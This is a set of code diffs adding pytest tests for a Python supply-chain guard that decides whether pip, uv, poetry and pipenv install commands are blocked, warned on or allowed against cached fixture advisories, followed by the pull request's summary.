+                    version="2.31.0",
+                    default_action="block",
+                    recommended_fix_version="2.32.0",
+                    related_advisory_ids=["GHSA-python-demo-1"],
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture("pip install requests==2.31.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["reasons"][0]["advisoryId"] == "PYSEC-2026-1"
+
+
+def test_evaluate_package_request_artifact_surfaces_yanked_safer_python_version_copy(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="urllib3",
+                    version="2.0.0",
+                    default_action="block",
+                    recommended_fix_version="2.0.7",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture("pip install urllib3==2.0.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.user_copy.next_step == "pip install urllib3==2.0.7"
+    assert "install `pip install urllib3==2.0.7`" in result.user_copy.harness_message

--- a/tests/test_guard_python_supply_chain_heuristics_phase12.py
+++ b/tests/test_guard_python_supply_chain_heuristics_phase12.py
@@ -203,6 +203,30 @@ build-backend = "setuptools.build_meta"
     assert result.packages[0]["reasons"][0]["code"] == "local_build_backend_risk"
 
 
+def test_evaluate_package_request_artifact_treats_local_python_path_extras_as_explicit(
+    tmp_path: Path,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(
+        workspace_dir / "pyproject.toml",
+        """
+[build-system]
+requires = ["setuptools>=68"]
+build-backend = "setuptools.build_meta"
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+
+    artifact = artifact_from_command_fixture("pip install .[pdf]", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "warn"
+    assert result.packages[0]["reasons"][0]["code"] == "local_build_backend_risk"
+
+
 def test_evaluate_package_request_artifact_keeps_benign_pyproject_urls_as_warn_only(tmp_path: Path) -> None:
     home_dir = tmp_path / "home"
     workspace_dir = tmp_path / "workspace"

--- a/tests/test_guard_python_supply_chain_phase12.py
+++ b/tests/test_guard_python_supply_chain_phase12.py
@@ -302,6 +302,58 @@ source = { registry = "https://pypi.org/simple" }
     assert results == []
 
 
+def test_evaluate_package_request_artifact_uses_manager_specific_fix_commands_for_python_transitives(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(
+        workspace_dir / "pyproject.toml",
+        "[project]\nname = 'demo'\nversion = '0.1.0'\ndependencies = ['fastapi>=0.110,<0.116']\n",
+    )
+    write_text(
+        workspace_dir / "uv.lock",
+        """
+version = 1
+
+[[package]]
+name = "fastapi"
+version = "0.115.0"
+source = { registry = "https://pypi.org/simple" }
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="requests",
+                    version="2.31.0",
+                    default_action="block",
+                    recommended_fix_version="2.32.0",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+    monkeypatch.setattr(
+        supply_chain_package_eval_module,
+        "_safe_dependency_map_for_path",
+        lambda _path, _text, *, deadline: {"requests": "2.31.0"},
+    )
+
+    artifact = artifact_from_command_fixture("uv add fastapi>=0.110,<0.116", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.user_copy.next_step == "uv add requests==2.32.0"
+
+
 @pytest.mark.parametrize(
     ("command", "manifest_name", "manifest_text", "lockfile_name", "lockfile_text", "package_name", "version"),
     [

--- a/tests/test_guard_python_supply_chain_phase12.py
+++ b/tests/test_guard_python_supply_chain_phase12.py
@@ -6,6 +6,8 @@ from pathlib import Path
 
 import pytest
 
+from codex_plugin_scanner.guard.runtime import supply_chain_package_eval as supply_chain_package_eval_module
+from codex_plugin_scanner.guard.runtime.supply_chain_bundle import load_supply_chain_bundle_response
 from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import evaluate_package_request_artifact
 from codex_plugin_scanner.guard.store import GuardStore
 
@@ -183,7 +185,7 @@ def test_evaluate_package_request_artifact_scopes_offline_decisions_to_python_ec
     )
     pypi_package["riskScore"] = 200
     pypi_package["knownExploited"] = False
-    pypi_package["malwareState"] = "unknown"
+    pypi_package["malwareState"] = "none"
     pypi_package["normalizedSeverity"] = "medium"
     pypi_package["exploitLevel"] = "none"
     store.cache_supply_chain_bundle(
@@ -226,6 +228,78 @@ def test_evaluate_package_request_artifact_does_not_allow_fix_versions_from_othe
     result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
 
     assert result.decision == "monitor"
+
+
+def test_transitive_lockfile_results_scope_python_matches_to_python_ecosystem(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(
+        workspace_dir / "pyproject.toml",
+        "[project]\nname = 'demo'\nversion = '0.1.0'\ndependencies = ['fastapi>=0.110,<0.116']\n",
+    )
+    write_text(
+        workspace_dir / "uv.lock",
+        """
+version = 1
+
+[[package]]
+name = "fastapi"
+version = "0.115.0"
+source = { registry = "https://pypi.org/simple" }
+
+[[package]]
+name = "requests"
+version = "2.31.0"
+source = { registry = "https://pypi.org/simple" }
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    npm_package = package_fixture(
+        name="requests",
+        version="2.31.0",
+        default_action="block",
+        recommended_fix_version="2.32.0",
+    )
+    npm_package["ecosystem"] = "npm"
+    npm_package["purl"] = "pkg:npm/requests@2.31.0"
+    npm_package["riskScore"] = 999
+    pypi_package = package_fixture(
+        name="requests",
+        version="2.31.0",
+        default_action="block",
+        recommended_fix_version="2.32.0",
+    )
+    pypi_package["riskScore"] = 200
+    pypi_package["knownExploited"] = False
+    pypi_package["malwareState"] = "none"
+    pypi_package["normalizedSeverity"] = "medium"
+    pypi_package["exploitLevel"] = "none"
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(packages=[npm_package, pypi_package]),
+        "2026-05-19T00:00:00Z",
+    )
+    monkeypatch.setattr(
+        supply_chain_package_eval_module,
+        "_safe_dependency_map_for_path",
+        lambda _path, _text, *, deadline: {"requests": "2.31.0"},
+    )
+
+    bundle_response = load_supply_chain_bundle_response(bundle_response_fixture(packages=[npm_package, pypi_package]))
+    artifact = artifact_from_command_fixture("uv add fastapi>=0.110,<0.116", workspace=workspace_dir)
+    results = supply_chain_package_eval_module._transitive_lockfile_results(
+        bundle_response=bundle_response,
+        artifact=artifact,
+        workspace_dir=workspace_dir,
+    )
+
+    assert results == []
 
 
 @pytest.mark.parametrize(

--- a/tests/test_guard_python_supply_chain_phase12.py
+++ b/tests/test_guard_python_supply_chain_phase12.py
@@ -128,6 +128,44 @@ requests==2.31.0 \\
     assert result.packages[0]["resolvedVersion"] == "2.31.0"
 
 
+def test_evaluate_package_request_artifact_resolves_marker_qualified_exact_requirements_versions(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(
+        workspace_dir / "requirements.txt",
+        'requests==2.31.0 ; python_version < "3.13"\n',
+    )
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="requests",
+                    version="2.31.0",
+                    default_action="block",
+                    recommended_fix_version="2.32.0",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture(
+        'pip install -r requirements.txt "requests>=2.31,<2.32"',
+        workspace=workspace_dir,
+    )
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["resolvedVersion"] == "2.31.0"
+
+
 def test_evaluate_package_request_artifact_allows_recommended_safe_python_version(
     tmp_path: Path,
     monkeypatch: pytest.MonkeyPatch,

--- a/tests/test_guard_python_supply_chain_phase12.py
+++ b/tests/test_guard_python_supply_chain_phase12.py
@@ -275,6 +275,7 @@ def test_evaluate_package_request_artifact_resolves_ranges_from_supported_python
 @pytest.mark.parametrize(
     ("command", "expected_next_step"),
     [
+        ("uv pip install fastapi==0.115.0", "uv pip install fastapi==0.115.1"),
         ("uv add fastapi==0.115.0", "uv add fastapi==0.115.1"),
         ("poetry add requests@2.31.0", "poetry add requests@2.32.0"),
         ("pipenv install flask==3.0.0", "pipenv install flask==3.0.1"),

--- a/tests/test_guard_python_supply_chain_phase12.py
+++ b/tests/test_guard_python_supply_chain_phase12.py
@@ -84,6 +84,48 @@ def test_evaluate_package_request_artifact_resolves_constraint_versions_for_pyth
     assert result.packages[0]["resolvedVersion"] == "0.27.1"
 
 
+def test_evaluate_package_request_artifact_resolves_versions_from_nested_requirements_paths(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(
+        workspace_dir / "deps" / "prod.txt",
+        """
+requests==2.31.0 \\
+    --hash=sha256:aaaaaaaa
+""".strip()
+        + "\n",
+    )
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="requests",
+                    version="2.31.0",
+                    default_action="block",
+                    recommended_fix_version="2.32.0",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture(
+        'pip install -r deps/prod.txt "requests>=2.31,<2.32"',
+        workspace=workspace_dir,
+    )
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["resolvedVersion"] == "2.31.0"
+
+
 def test_evaluate_package_request_artifact_allows_recommended_safe_python_version(
     tmp_path: Path,
     monkeypatch: pytest.MonkeyPatch,

--- a/tests/test_guard_python_supply_chain_phase12.py
+++ b/tests/test_guard_python_supply_chain_phase12.py
@@ -1,0 +1,248 @@
+"""Phase 12 Python evaluator behavior tests."""
+
+from __future__ import annotations
+
+from pathlib import Path
+
+import pytest
+
+from codex_plugin_scanner.guard.runtime.supply_chain_package_eval import evaluate_package_request_artifact
+from codex_plugin_scanner.guard.store import GuardStore
+
+from .guard_python_phase12_support import (
+    WORKSPACE_ID,
+    artifact_from_command_fixture,
+    bundle_response_fixture,
+    package_fixture,
+    write_text,
+)
+
+
+def test_evaluate_package_request_artifact_blocks_exact_vulnerable_pip_version(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="requests",
+                    version="2.31.0",
+                    default_action="block",
+                    recommended_fix_version="2.32.0",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture("pip install requests==2.31.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["resolvedVersion"] == "2.31.0"
+
+
+def test_evaluate_package_request_artifact_resolves_constraint_versions_for_python_ranges(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(workspace_dir / "constraints.txt", "httpx==0.27.1\n")
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="httpx",
+                    version="0.27.1",
+                    default_action="block",
+                    recommended_fix_version="0.27.2",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture(
+        'pip install -c constraints.txt "httpx[socks]>=0.26,!=0.27.0,<0.28"',
+        workspace=workspace_dir,
+    )
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["resolvedVersion"] == "0.27.1"
+
+
+def test_evaluate_package_request_artifact_allows_recommended_safe_python_version(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name="requests",
+                    version="2.31.0",
+                    default_action="block",
+                    recommended_fix_version="2.32.0",
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture("pip install requests==2.32.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "allow"
+    assert result.policy_action == "allow"
+
+
+@pytest.mark.parametrize(
+    ("command", "manifest_name", "manifest_text", "lockfile_name", "lockfile_text", "package_name", "version"),
+    [
+        (
+            "poetry add requests@^2.31",
+            "pyproject.toml",
+            "[tool.poetry]\nname = 'demo'\nversion = '0.1.0'\n[tool.poetry.dependencies]\nrequests = '^2.31'\n",
+            "poetry.lock",
+            """
+[[package]]
+name = "requests"
+version = "2.31.0"
+groups = ["main"]
+""",
+            "requests",
+            "2.31.0",
+        ),
+        (
+            "uv add fastapi>=0.110,<0.116",
+            "pyproject.toml",
+            "[project]\nname = 'demo'\nversion = '0.1.0'\ndependencies = ['fastapi>=0.110,<0.116']\n",
+            "uv.lock",
+            """
+version = 1
+
+[[package]]
+name = "fastapi"
+version = "0.115.0"
+source = { registry = "https://pypi.org/simple" }
+""",
+            "fastapi",
+            "0.115.0",
+        ),
+        (
+            "pipenv install flask~=3.0",
+            "Pipfile",
+            "[packages]\nflask = '~=3.0'\n",
+            "Pipfile.lock",
+            """
+{"default":{"flask":{"version":"==3.0.0"}}}
+""",
+            "flask",
+            "3.0.0",
+        ),
+    ],
+)
+def test_evaluate_package_request_artifact_resolves_ranges_from_supported_python_lockfiles(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    command: str,
+    manifest_name: str,
+    manifest_text: str,
+    lockfile_name: str,
+    lockfile_text: str,
+    package_name: str,
+    version: str,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(workspace_dir / manifest_name, manifest_text)
+    write_text(workspace_dir / lockfile_name, lockfile_text.strip() + "\n")
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name=package_name,
+                    version=version,
+                    default_action="block",
+                    recommended_fix_version=None,
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture(command, workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.packages[0]["resolvedVersion"] == version
+
+
+@pytest.mark.parametrize(
+    ("command", "expected_next_step"),
+    [
+        ("uv add fastapi==0.115.0", "uv add fastapi==0.115.1"),
+        ("poetry add requests@2.31.0", "poetry add requests@2.32.0"),
+        ("pipenv install flask==3.0.0", "pipenv install flask==3.0.1"),
+    ],
+)
+def test_evaluate_package_request_artifact_uses_manager_specific_python_fix_commands(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+    command: str,
+    expected_next_step: str,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    write_text(workspace_dir / "pyproject.toml", "[project]\nname = 'demo'\n")
+    write_text(workspace_dir / "Pipfile", "[packages]\nflask = '*'\n")
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    package_name = "fastapi" if "fastapi" in command else "requests" if "requests" in command else "flask"
+    fix_version = "0.115.1" if package_name == "fastapi" else "2.32.0" if package_name == "requests" else "3.0.1"
+    current_version = "0.115.0" if package_name == "fastapi" else "2.31.0" if package_name == "requests" else "3.0.0"
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(
+            packages=[
+                package_fixture(
+                    name=package_name,
+                    version=current_version,
+                    default_action="block",
+                    recommended_fix_version=fix_version,
+                )
+            ]
+        ),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture(command, workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "block"
+    assert result.user_copy.next_step == expected_next_step
+    assert expected_next_step in result.user_copy.harness_message

--- a/tests/test_guard_python_supply_chain_phase12.py
+++ b/tests/test_guard_python_supply_chain_phase12.py
@@ -115,6 +115,77 @@ def test_evaluate_package_request_artifact_allows_recommended_safe_python_versio
     assert result.policy_action == "allow"
 
 
+def test_evaluate_package_request_artifact_scopes_offline_decisions_to_python_ecosystem(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    npm_package = package_fixture(
+        name="requests",
+        version="2.31.0",
+        default_action="block",
+        recommended_fix_version="2.32.0",
+    )
+    npm_package["ecosystem"] = "npm"
+    npm_package["purl"] = "pkg:npm/requests@2.31.0"
+    npm_package["riskScore"] = 999
+    pypi_package = package_fixture(
+        name="requests",
+        version="2.31.0",
+        default_action="block",
+        recommended_fix_version="2.32.0",
+    )
+    pypi_package["riskScore"] = 200
+    pypi_package["knownExploited"] = False
+    pypi_package["malwareState"] = "unknown"
+    pypi_package["normalizedSeverity"] = "medium"
+    pypi_package["exploitLevel"] = "none"
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(packages=[npm_package, pypi_package]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture("pip install requests==2.31.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "monitor"
+    assert result.packages[0]["decision"] == "monitor"
+
+
+def test_evaluate_package_request_artifact_does_not_allow_fix_versions_from_other_ecosystems(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    home_dir = tmp_path / "home"
+    workspace_dir = tmp_path / "workspace"
+    workspace_dir.mkdir()
+    store = GuardStore(home_dir)
+    monkeypatch.setattr(store, "get_cloud_workspace_id", lambda: WORKSPACE_ID)
+    npm_package = package_fixture(
+        name="requests",
+        version="2.31.0",
+        default_action="block",
+        recommended_fix_version="2.32.0",
+    )
+    npm_package["ecosystem"] = "npm"
+    npm_package["purl"] = "pkg:npm/requests@2.31.0"
+    store.cache_supply_chain_bundle(
+        WORKSPACE_ID,
+        bundle_response_fixture(packages=[npm_package]),
+        "2026-05-19T00:00:00Z",
+    )
+
+    artifact = artifact_from_command_fixture("pip install requests==2.32.0", workspace=workspace_dir)
+    result = evaluate_package_request_artifact(artifact=artifact, store=store, workspace_dir=workspace_dir)
+
+    assert result.decision == "monitor"
+
+
 @pytest.mark.parametrize(
     ("command", "manifest_name", "manifest_text", "lockfile_name", "lockfile_text", "package_name", "version"),
     [


### PR DESCRIPTION
## Summary
- add Python package manifest, lockfile, constraint, and advisory resolution for Guard supply-chain evaluation
- harden local Python install heuristics, credential redaction, and exec-flow blocking for pipx/uvx
- add localhost fake PyPI simple-index proof plus Phase 12 regression coverage

## Testing
- ruff check src tests
- pytest -q